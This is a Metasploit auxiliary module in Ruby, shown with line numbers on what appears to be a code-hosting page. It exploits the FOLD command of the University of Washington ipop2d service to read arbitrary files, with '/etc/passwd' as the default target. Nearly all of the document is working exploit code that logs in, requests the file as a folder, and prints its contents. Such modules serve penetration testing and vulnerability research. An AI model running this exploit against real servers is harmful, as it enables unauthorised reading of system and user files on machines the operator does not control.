Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Pop2
8

9
  def initialize(info = {})
10
    super(update_info(info,
11
      'Name'           => 'UoW pop2d Remote File Retrieval Vulnerability',
12
      'Description'    => %q{
13
        This module exploits a vulnerability in the FOLD command of the
14
        University of Washington ipop2d service. By specifying an arbitrary
15
        folder name it is possible to retrieve any file which is world or group
16
        readable by the user ID of the POP account. This vulnerability can only
17
        be exploited with a valid username and password. The From address is
18
        the file owner.
19
      },
20
      'Author'         => [ 'aushack' ],
21
      'License'        => MSF_LICENSE,
22
      'References'     =>
23
        [
24
          [ 'OSVDB', '368' ],
25
          [ 'BID', '1484' ],
26
        ],
27
      'DisclosureDate' => '2000-07-14'))
28

29
    register_options(
30
      [
31
        OptString.new('FILE', [ true, "The file to retrieve", '/etc/passwd' ])
32
      ])
33
  end
34

35
  def run
36
    connect_login
37
    file = datastore['FILE']
38
    res = send_cmd( ['FOLD', file] , true)
39

40
    if (res =~ /#1 messages in/)
41
      send_cmd( ['READ 1'] , true)
42
      file_output = send_cmd( ['RETR'] , true)
43
      print_status("File output:\r\n\r\n#{file_output}\r\n")
44
      send_cmd( ['ACKS'] , true)
45
    elsif (res =~ /#0 messages in/)
46
      print_status("File #{file} not found or read-access is denied.")
47
    end
48

49
    send_cmd( ['QUIT'] , true)
50
    disconnect
51
  end
52
end
53

54